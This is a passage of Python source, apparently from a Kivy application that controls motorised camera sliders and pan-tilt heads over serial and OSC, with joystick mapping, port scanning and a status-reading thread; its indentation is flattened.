def stopping(self, dt):
global whileLoopRun
whileLoopRun = False
sys.exit()
def start_event_loop_thread(self):
"""Start the asyncio event loop thread. Bound to the top button."""
if self.event_loop_worker is not None:
print("loop event worker is not NONE")
return
#self.root.ids.btn_OSC.text = ("OSC ON")
self.event_loop_worker = worker = EventLoopWorker()
#pulse_listener_label = self.root.ids.pulse_listener
def display_on_pulse(instance, text):
self.root.ids.txtInput_read.text += text
self.root.ids.scroll_view.scroll_y = 0
#print(text)
#pulse_listener_label.text = text
# make the label react to the worker's `on_pulse` event:
worker.bind(on_pulse=display_on_pulse)
worker.start()
def submit_pulse_text(self, text):
"""Send the TextInput string over to the asyncio event loop worker."""
worker = self.event_loop_worker
if worker is not None:
loop = self.event_loop_worker.loop
# use the thread safe variant to run it on the asyncio event loop:
loop.call_soon_threadsafe(worker.set_pulse_text, text)
'''
def on_press(self, key):
global axisX
global axisY
global axisZ
global doKeyControlA
global doKeyControlD
global doKeyControlW
global doKeyControlS
global doKeyControlSL
global doKeyControlSR
global panKeyPressed
global sliderKeyPressed
global PTKeyChange
global SlKeyChange
global doKeyControl
global whichCamSerial
global xDivSet
global yDivSet
StreamDeck = True
'''
'''
if doKeyControl:
try:
if hasattr(key, 'char'):
if key.char == 'a':
axisX = -255
doKeyControlA = True
PTKeyChange = True
xKeySet = (xDivSet*4)
elif key.char == 'd':
axisX = 255
doKeyControlD = True
PTKeyChange = True
xKeySet = (xDivSet*36)
elif key.char == 'w':
axisY = -255
doKeyControlW = True
PTKeyChange = True
yKeySet = (yDivSet*67)
elif key.char == 's':
axisY = 255
doKeyControlS = True
PTKeyChange = True
yKeySet = (yDivSet*35)
elif key.char == 'z':
axisZ = -255
doKeyControlSL = True
SlKeyChange = True
elif key.char == 'x':
axisZ = 255
doKeyControlSR = True
SlKeyChange = True
elif key.char == 'r':
if StreamDeck and cam1Pos1Set and not cam1AtPos1:
self.sendSerial('&z')
elif key.char == 'f':
if StreamDeck and cam2Pos1Set and not cam2AtPos1:
self.sendSerial('&a')
elif key.char == 'v':
if StreamDeck and cam3Pos1Set and not cam3AtPos1:
self.sendSerial('&q')
elif key.char == 'R':
if StreamDeck:
self.sendSerial('&Z')
elif key.char == 'F':
if StreamDeck:
self.sendSerial('&A')
elif key.char == 'V':
if StreamDeck:
self.sendSerial('&Q')
elif key.char == 't':
if StreamDeck and cam1Pos2Set and not cam1AtPos2:
self.sendSerial('&x')
elif key.char == 'g':
if StreamDeck and cam2Pos2Set and not cam2AtPos2:
self.sendSerial('&s')
elif key.char == 'b':
if StreamDeck and cam3Pos2Set and not cam3AtPos2:
self.sendSerial('&w')
elif key.char == 'T':
if StreamDeck:
self.sendSerial('&X')
elif key.char == 'G':
if StreamDeck:
self.sendSerial('&S')
elif key.char == 'B':
if StreamDeck:
self.sendSerial('&W')
elif key.char == 'y':
if StreamDeck and cam1Pos3Set and not cam1AtPos3:
self.sendSerial('&c')
elif key.char == 'h':
if StreamDeck and cam2Pos3Set and not cam2AtPos3:
self.sendSerial('&d')
elif key.char == 'n':
if StreamDeck and cam3Pos3Set and not cam3AtPos3:
self.sendSerial('&e')
elif key.char == 'Y':
if StreamDeck:
self.sendSerial('&C')
elif key.char == 'H':
if StreamDeck:
self.sendSerial('&D')
elif key.char == 'N':
if StreamDeck:
self.sendSerial('&E')
elif key.char == 'u':
if StreamDeck and cam1Pos4Set and not cam1AtPos4:
self.sendSerial('&v')
elif key.char == 'j':
if StreamDeck and cam2Pos4Set and not cam2AtPos4:
self.sendSerial('&f')
elif key.char == 'm':
if StreamDeck and cam3Pos4Set and not cam3AtPos4:
self.sendSerial('&r')
elif key.char == 'U':
if StreamDeck:
self.sendSerial('&V')
elif key.char == 'J':
if StreamDeck:
self.sendSerial('&F')
elif key.char == 'M':
if StreamDeck:
self.sendSerial('&R')
elif key.char == 'i':
if StreamDeck and cam1Pos5Set and not cam1AtPos5:
self.sendSerial('&b')
elif key.char == 'k':
if StreamDeck and cam2Pos5Set and not cam2AtPos5:
self.sendSerial('&g')
elif key.char == ',':
if StreamDeck and cam3Pos5Set and not cam3AtPos5:
self.sendSerial('&t')
elif key.char == 'I':
if StreamDeck:
self.sendSerial('&B')
elif key.char == 'K':
if StreamDeck:
self.sendSerial('&G')
elif key.char == '<':
if StreamDeck:
self.sendSerial('&T')
elif key.char == 'o':
if StreamDeck and cam1Pos6Set and not cam1AtPos6:
self.sendSerial('&n')
elif key.char == 'l':
if StreamDeck and cam2Pos6Set and not cam2AtPos6:
self.sendSerial('&h')
elif key.char == '.':
if StreamDeck and cam3Pos6Set and not cam3AtPos6:
self.sendSerial('&y')
elif key.char == 'O':
if StreamDeck:
self.sendSerial('&N')
elif key.char == 'L':
if StreamDeck:
self.sendSerial('&H')
elif key.char == '>':
if StreamDeck:
self.sendSerial('&Y')
if not mousePTClick:
self.root.ids.PTJoyDot.pos = (xKeySet, yKeySet)
#PTXMin = (xDivSet*4)
#PTXMax = (xDivSet*36)
#PTYMin = (yDivSet*35)
#PTYMax = (yDivSet*67)
elif key.name == 'tab':
if whichCamSerial == 1:
whichCamSerial = 2;
elif whichCamSerial == 2:
whichCamSerial = 3;
elif whichCamSerial == 3:
whichCamSerial = 1;
except:
return
if (doKeyControlA or doKeyControlD or doKeyControlW or doKeyControlS):
panKeyPressed = True
if (doKeyControlSL or doKeyControlSR):
sliderKeyPressed = True
'''
'''
def on_release(self, key):
global axisX
global axisY
global axisZ
global doKeyControlA
global doKeyControlD
global doKeyControlW
global doKeyControlS
global doKeyControlSL
global doKeyControlSR
global PTKeyChange
global SlKeyChange
global doKeyControl
global panKeyPressed
global sliderKeyPressed
global xDivSet
global yDivSet
'''
'''
if doKeyControl:
try:
if hasattr(key, 'char'):
if key.char == 'a':
doKeyControlA = False
PTKeyChange = True
if not doKeyControlD:
axisX = 0
else:
axisX = 255
elif key.char == 'd':
doKeyControlD = False
PTKeyChange = True
if not doKeyControlA:
axisX = 0
else:
axisX = -255
elif key.char == 'w':
doKeyControlW = False
PTKeyChange = True
if not doKeyControlS:
axisY = 0
else:
axisY = -255
elif key.char == 's':
doKeyControlS = False
PTKeyChange = True
if not doKeyControlW:
axisY = 0
else:
axisY = 255
elif key.char == ',':
doKeyControlSL = False
SlKeyChange = True
if not doKeyControlSR:
axisZ = 0
else:
axisZ = 255
elif key.char == '.':
doKeyControlSR = False
SlKeyChange = True
if not doKeyControlSL:
axisZ = 0
else:
axisZ = -255
except:
return
if (not doKeyControlA and not doKeyControlD and not doKeyControlW and not doKeyControlS):
panKeyPressed = False
if (doKeyControlSL and not doKeyControlSR):
sliderKeyPressed = False
'''
def on_stop(self):
if self.serial_port:
self.read_thread = None
def on_touch_up(self, obj, obj_prop):
global mousePTClick
global mouseSlClick
global panKeyPressed
global sliderKeyPressed
global axisX
global axisY
global axisZ
global xDivSet
global yDivSet
if mousePTClick and not panKeyPressed:
mousePTClick = False
self.root.ids.PTJoyDot.pos = (self.screen.width, self.screen.height)
self.root.ids.PTJoyDotPress.pos = ((xDivSet*18), (yDivSet*49))
if mouseSlClick and not sliderKeyPressed:
mouseSlClick = False
self.root.ids.SlJoyDot.pos = (self.screen.width, self.screen.height)
self.root.ids.SlJoyDotPress.pos = ((xDivSet*18), (yDivSet*27))
if cam1isZooming:
self.sendCam1ZoomStop()
if cam2isZooming:
self.sendCam2ZoomStop()
if cam3isZooming:
self.sendCam3ZoomStop()
axisX = 0
axisY = 0
axisZ = 0
self.doJoyMoves(1)
def mouse_pos(self, window, pos):
global abs_coord_x
global abs_coord_y
global abs_coords
global mousePTClick
global mouseSlClick
global axisX
global axisY
global axisZ
global xDivSet
global yDivSet
abs_coord_x = pos[0]
abs_coord_y = pos[1]
abs_coords = (abs_coord_x, abs_coord_y)
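# While a joystick dot is held, clamp the pointer to the pad area and map the
# position linearly onto the -255..255 axis range expected by sendJoystick().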
if mousePTClick:
PTXMin = (xDivSet*4)
PTXMax = (xDivSet*36)
PTYMin = (yDivSet*35)
PTYMax = (yDivSet*67)
if abs_coord_x < PTXMin: #29:
abs_coord_x = PTXMin #29
elif abs_coord_x > PTXMax: #352:
abs_coord_x = PTXMax #352
if abs_coord_y > PTYMax: #674:
abs_coord_y = PTYMax #674
elif abs_coord_y < PTYMin: #351:
abs_coord_y = PTYMin #351
self.root.ids.PTJoyDotPress.pos = (self.screen.width, self.screen.height)
self.root.ids.PTJoyDot.pos = ((abs_coord_x - (xDivSet*2)), (abs_coord_y - (yDivSet*2)))
axisX = int(self.scale((abs_coord_x), (PTXMin, PTXMax), (-255,255)))
axisY = int(self.scale((abs_coord_y), (PTYMin, PTYMax), (-255,255)))
self.doJoyMoves(1)
if mouseSlClick:
SlXMin = (xDivSet*4)
SlXMax = (xDivSet*36)
SlY = (yDivSet*27)
if abs_coord_x < SlXMin: #29:
abs_coord_x = SlXMin #29
elif abs_coord_x > SlXMax: #352:
abs_coord_x = SlXMax #352
self.root.ids.SlJoyDotPress.pos = (self.screen.width, self.screen.height)
self.root.ids.SlJoyDot.pos = ((abs_coord_x - (xDivSet*2)), SlY)
axisZ = int(self.scale((abs_coord_x), (SlXMin, SlXMax), (-255,255)))
self.doJoyMoves(1)
def PTJoyDotPressed(self):
global abs_coord_x
global abs_coord_y
global mousePTClick
mousePTClick = True
def SlJoyDotPressed(self):
global abs_coord_x
global abs_coord_y
global mouseSlClick
mouseSlClick = True
def doJoyMoves(self, dt):
global axisX
global axisY
global axisZ
global oldAxisX
global oldAxisY
global oldAxisZ
global arr
global currentMillisMoveCheck
global previousMillisMoveCheck
global previousTime
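# Keep-alive: while an axis is held unchanged (and non-zero), re-send the last
# joystick packet every moveCheckInterval; send immediately when any axis changes.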
if (axisX == oldAxisX) and (axisY == oldAxisY) and (axisZ == oldAxisZ) and ((abs(axisX) + abs(axisY) + abs(axisZ)) != 0):
currentMillisMoveCheck = time.time()
if (currentMillisMoveCheck - previousMillisMoveCheck > moveCheckInterval):
previousMillisMoveCheck = currentMillisMoveCheck
#arr = [4, axisZh, axisXh, axisYh] # for debugging
self.sendJoystick(arr)
elif ((axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ)): # or doKeyControlA or doKeyControlD or doKeyControlW or doKeyControlS or doKeyControlSL or doKeyControlSR) and ((time.time() - previousTime) > 0.03) :
previousTime = time.time()
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
axisXh = self.toHex(axisX, 16)
axisYh = self.toHex(axisY, 16)
axisZh = self.toHex(axisZ, 16)
arr = [4, axisZh, axisXh, axisYh]
self.sendJoystick(arr)
previousMillisMoveCheck = time.time()
def sendJoystick(self, arr):
global data
global whichCamSerial
global whichCamOSC
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
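# Assemble the joystick packet in the shared data buffer: data[0] is always 4
# for a joystick move, followed by a sign byte (0 or 255) and magnitude byte
# per axis (slider, pan, tilt); data[7] selects the target camera (whichCamOSC-3
# for OSC moves, otherwise whichCamSerial). The axis values arrive as 16-bit
# two's-complement hex strings from toHex(); values above 257 fall in the
# negative range and are folded back into a byte by subtracting 65281.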
sliderInt = int(arr[1], 16)
panInt = int(arr[2], 16)
tiltInt = int(arr[3], 16)
data[0] = 4
if ((sliderInt > 0) and (sliderInt < 256)):
data[1] = 0
data[2] = sliderInt
elif sliderInt > 257:
data[1] = 255
data[2] = (sliderInt-65281)
else:
data[1] = 0
data[2] = 0
if ((panInt > 0) and (panInt < 256)):
data[3] = 0
data[4] = panInt
elif panInt > 257:
data[3] = 255
data[4] = (panInt-65281)
else:
data[3] = 0
data[4] = 0
if ((tiltInt > 0) and (tiltInt < 256)):
data[5] = 0
data[6] = tiltInt
elif tiltInt > 257:
data[5] = 255
data[6] = (tiltInt-65281)
else:
data[5] = 0
data[6] = 0
if whichCamOSC > 3:
data[7] = whichCamOSC - 3
else:
data[7] = whichCamSerial
if not self.serial_port:
pass
else:
self.serial_port.write(data)
#print(data) # for debugging
if whichCamSerial == 1:
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
elif whichCamSerial == 2:
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
elif whichCamSerial == 3:
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
self.doButtonColours()
def OSC_on_press(self, cam, key):
global moveType
global data
global whichCamSerial
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global previousMillisMoveCheck
global whichCamOSC
global axisX
global axisY
global axisZ
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
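# moveType selects how OSC direction keys behave: 1 and 2 trigger single step
# moves of increasing size; 3 drives the axes continuously until the matching
# release key (upper-case letter, '<' or '>') zeroes them again.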
if moveType == 1:
if key == 'a':
self.joyL1OSC(cam)
if key == 'd':
self.joyR1OSC(cam)
if key == 'w':
self.joyU1OSC(cam)
if key == 's':
self.joyD1OSC(cam)
if key == ',':
self.joySL10OSC(cam)
if key == '.':
self.joySR10OSC(cam)
elif moveType == 2:
if key == 'a':
self.joyL10OSC(cam)
if key == 'd':
self.joyR10OSC(cam)
if key == 'w':
self.joyU10OSC(cam)
if key == 's':
self.joyD10OSC(cam)
if key == ',':
self.joySL100OSC(cam)
if key == '.':
self.joySR100OSC(cam)
elif moveType == 3:
if key == 'a':
axisX = -255
elif key == 'A':
axisX = 0
if key == 'd':
axisX = 255
elif key == 'D':
axisX = 0
if key == 'w':
axisY = 255
elif key == 'W':
axisY = 0
if key == 's':
axisY = -255
elif key == 'S':
axisY = 0
if key == ',':
axisZ = -255
elif key == '<':
axisZ = 0
if key == '.':
axisZ = 255
elif key == '>':
axisZ = 0
if (axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ):
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
whichCamOSC = cam + 3
self.doJoyMoves(1)
self.doButtonColours()
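# Linearly rescale val from the src range to the dst range.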
def scale(self, val, src, dst):
return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]
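# Two's-complement hex string of val using nbits bits, so negative axis values
# become 0xff01..0xffff for -255..-1.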
def toHex(self, val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))
def setPos(self, state):
global SetPosToggle
global xDivSet
global yDivSet
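# Toggle "Set Pos" mode (state 3 toggles, 0/1 force off/on) and mirror the new
# state to the external OSC control surface via the /press and /style paths.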
if (SetPosToggle and state == 3) or state == 0:
SetPosToggle = False
client.send_message("/setPos", 0)
client.send_message("/press/bank/4/8", 0)
client.send_message("/press/bank/5/8", 0)
client.send_message("/press/bank/6/8", 0)
client.send_message("/style/bgcolor/4/8", [0, 0, 0])
client.send_message("/style/bgcolor/5/8", [0, 0, 0])
client.send_message("/style/bgcolor/6/8", [0, 0, 0])
self.root.ids.setPos.background_color = get_color_from_hex("#666666")
elif (not SetPosToggle and state == 3) or state == 1:
SetPosToggle = True
client.send_message("/setPos", 1)
client.send_message("/press/bank/4/8", 1)
client.send_message("/press/bank/5/8", 1)
client.send_message("/press/bank/6/8", 1)
client.send_message("/style/bgcolor/4/8", [255, 0, 0])
client.send_message("/style/bgcolor/5/8", [255, 0, 0])
client.send_message("/style/bgcolor/6/8", [255, 0, 0])
self.root.ids.setPos.background_color = get_color_from_hex("#7D0000")
def sendCam1RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&.')
def sendCam2RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&l')
def sendCam3RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&o')
def sendCam1RecordToggleOSC(self):
self.sendSerial('&.')
def sendCam2RecordToggleOSC(self):
self.sendSerial('&l')
def sendCam3RecordToggleOSC(self):
self.sendSerial('&o')
def on_btn_scan_release(self):
global btn_scan_show
global xDivSet
global yDivSet
global longestSerial
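# First scan pass: if a port name containing "usbmodem" or "usb/00" is found it
# is connected automatically; otherwise one button per detected port is added
# to the port list so the user can pick one.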
if not btn_scan_show:
btn_scan_show = True
self.uiDict['box_list'].clear_widgets()
self.device_name_list = []
if platform == 'android':
usb_device_list = usb.get_usb_device_list()
self.device_name_list = [
device.getDeviceName() for device in usb_device_list
]
else:
usb_device_list = list_ports.comports()
self.device_name_list = [port.device for port in usb_device_list]
usb_port = 'usbmodem'
usb_port2 = 'usb/00'
if (usb_port in '\t'.join(self.device_name_list)):
try:
serialPortSelect = [string for string in self.device_name_list if usb_port in string]
self.autoSerial(serialPortSelect, 1)
except:
pass
elif (usb_port2 in '\t'.join(self.device_name_list)):
try:
serialPortSelect = [string for string in self.device_name_list if usb_port2 in string]
self.autoSerial(serialPortSelect, 1)
except:
pass
else:
for device_name in self.device_name_list:
btnText = device_name
if len(btnText) > longestSerial:
longestSerial = len(btnText)
button = Button(text=btnText, size_hint_y=None, height='60dp')
button.bind(on_release=self.on_btn_device_release)
self.uiDict['box_list'].add_widget(button)
self.root.ids.scanDD.pos = (((xDivSet*110)-(xDivSet*(longestSerial/2))), ((yDivSet*65) - ((yDivSet*7.4) * len(usb_device_list))))
if platform == "win32" or platform == "Windows" or platform == "win":
self.root.ids.box_list.size = (((xDivSet*(longestSerial*1.4))), 0)
else:
self.root.ids.box_list.size = (((xDivSet*(longestSerial*0.8))), 0)
else:
btn_scan_show = False
self.uiDict['box_list'].clear_widgets()
def on_btn_help_release(self):
global btn_help_show
if not btn_help_show:
btn_help_show = True
self.root.ids.helpLabel.visible = True
self.root.ids.helpCanvas.visible = True
elif btn_help_show:
btn_help_show = False
self.root.ids.helpLabel.visible = False
self.root.ids.helpCanvas.visible = False
def autoSerial(self, serialPortSelect, dt):
global btn_scan_show
global USBrequsted
global device
global device_name
global serialLoop
btn_scan_show = False
device_name = serialPortSelect[0]
self.root.ids.txtInput_read.text += ("Connecting to: " + device_name + "\n")
self.root.ids.scroll_view.scroll_y = 0
if platform == 'android':
device = usb.get_usb_device(device_name)
if USBrequsted:
previousTicks = time.time() + 5
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions received.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
self.root.ids.txtInput_read.text += "USB permissions declined.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
if not device:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(No devices found)\n"
self.root.ids.scroll_view.scroll_y = 0
return
if not usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "Requesting USB permissions.\n"
self.root.ids.scroll_view.scroll_y = 0
usb.request_usb_permission(device)
USBrequsted = True
Clock.schedule_once(self.doConnect, 1)
return
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
else:
try:
self.serial_port = Serial(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made (auto).\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n"
self.root.ids.scroll_view.scroll_y = 0
self.serial_port.close()
return
def doConnect(self, dt):
global device
global USBrequsted
global device_name
global serialLoop
if platform == 'android':
previousTicks = time.time() + 5
# Busy-wait up to five seconds for the USB permission dialog to be answered
while not usb.has_usb_permission(device) and time.time() < previousTicks:
pass
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions received.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
self.root.ids.txtInput_read.text += "USB permissions declined.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
if self.read_thread:
# threading.Thread has no kill(); signal the read loop to stop and drop the stale reference
serialLoop = False
self.read_thread = None
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made 2.\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n" + str(self.read_thread)
self.root.ids.scroll_view.scroll_y = 0
self.serial_port.close()
return
def on_btn_device_release(self, btn):
global serialLoop
device_name = btn.text
self.root.ids.txtInput_read.text += ("Connecting to: " + device_name + "\n")
self.root.ids.scroll_view.scroll_y = 0
self.uiDict['box_list'].clear_widgets()
if platform == 'android':
device = usb.get_usb_device(device_name)
if not device:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(No devices found)\n"
self.root.ids.scroll_view.scroll_y = 0
return
if not usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "Requesting USB permissions.\n"
self.root.ids.scroll_view.scroll_y = 0
usb.request_usb_permission(device)
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions active.\nConnect again.\n"
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "USB permissinos not set.\nTry again\n"
self.root.ids.scroll_view.scroll_y = 0
return
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
return
else:
try:
self.serial_port = Serial(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n"
self.root.ids.scroll_view.scroll_y = 0
return
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made (selection).\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n"
self.root.ids.scroll_view.scroll_y = 0
def btnReport(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&(1')
elif whichCamSerial == 2:
self.sendSerial('&(2')
elif whichCamSerial == 3:
self.sendSerial('&(3')
def btnReportPos(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&)1')
elif whichCamSerial == 2:
self.sendSerial('&)2')
elif whichCamSerial == 3:
self.sendSerial('&)3')
def btnReportKey(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&-1')
elif whichCamSerial == 2:
self.sendSerial('&-2')
elif whichCamSerial == 3:
self.sendSerial('&-3')
def read_msg_thread(self):
global msg
global serialLoop
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
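# Background serial reader: poll the port until serialLoop is cleared, hand
# received lines to readSerial(), and reset all cached camera state if the
# port drops.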
while serialLoop:
global whileLoopRun
if not whileLoopRun:
serialLoop = False
try:
if not self.serial_port.is_open:
serialLoop = False
received_msg = self.serial_port.readline(self.serial_port.in_waiting)
if received_msg:
msg = bytes(received_msg).decode('utf8', "ignore")
self.readSerial(msg)
except:
self.on_stop()
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Serial Port disconnected.\n[/color]"
self.root.ids.scroll_view.scroll_y = 0
cam1PTSpeed = 1
cam2PTSpeed = 1
cam3PTSpeed = 1
cam1SliderSpeed = 1
cam2SliderSpeed = 1
cam3SliderSpeed = 1
cam1Pos1Run = False
cam1Pos1Set = False
cam1AtPos1 = False
cam1Pos2Run = False
cam1Pos2Set = False
cam1AtPos2 = False
cam1Pos3Run = False
cam1Pos3Set = False
cam1AtPos3 = False
cam1Pos4Run = False
cam1Pos4Set = False
cam1AtPos4 = False
cam1Pos5Run = False
cam1Pos5Set = False
cam1AtPos5 = False
cam1Pos6Run = False
cam1Pos6Set = False
cam1AtPos6 = False
cam2Pos1Run = False
cam2Pos1Set = False
cam2AtPos1 = False
cam2Pos2Run = False
cam2Pos2Set = False
cam2AtPos2 = False
cam2Pos3Run = False
cam2Pos3Set = False
cam2AtPos3 = False
cam2Pos4Run = False
cam2Pos4Set = False
cam2AtPos4 = False
cam2Pos5Run = False
cam2Pos5Set = False
cam2AtPos5 = False
cam2Pos6Run = False
cam2Pos6Set = False
cam2AtPos6 = False
cam3Pos1Run = False
cam3Pos1Set = False
cam3AtPos1 = False
cam3Pos2Run = False
cam3Pos2Set = False
cam3AtPos2 = False
cam3Pos3Run = False
cam3Pos3Set = False
cam3AtPos3 = False
cam3Pos4Run = False
cam3Pos4Set = False
cam3AtPos4 = False
cam3Pos5Run = False
cam3Pos5Set = False
cam3AtPos5 = False
cam3Pos6Run = False
cam3Pos6Set = False
cam3AtPos6 = False
self.doButtonColours()
serialLoop = False
@mainthread
def readSerial(self, msg):
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
global Cam1TextColour
global Cam2TextColour
global Cam3TextColour
global whichCamRead
global xDivSet
global yDivSet
#print(msg)
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
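# Status replies start with "~" followed by three digits: camera, position and
# state (1 = position saved, 2 = moving, 3 = arrived; x14/x24 = record off/on,
# x00 = clear all positions for that camera). Replies starting with "?" are ignored.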
if msg[0] == "":
msg = ''
return
elif msg[0] == "?":
msg = ''
return
elif msg[0] == "~":
if len(msg) == 1:
msg = ''
return
elif msg[1] == "0":
msg = ''
return
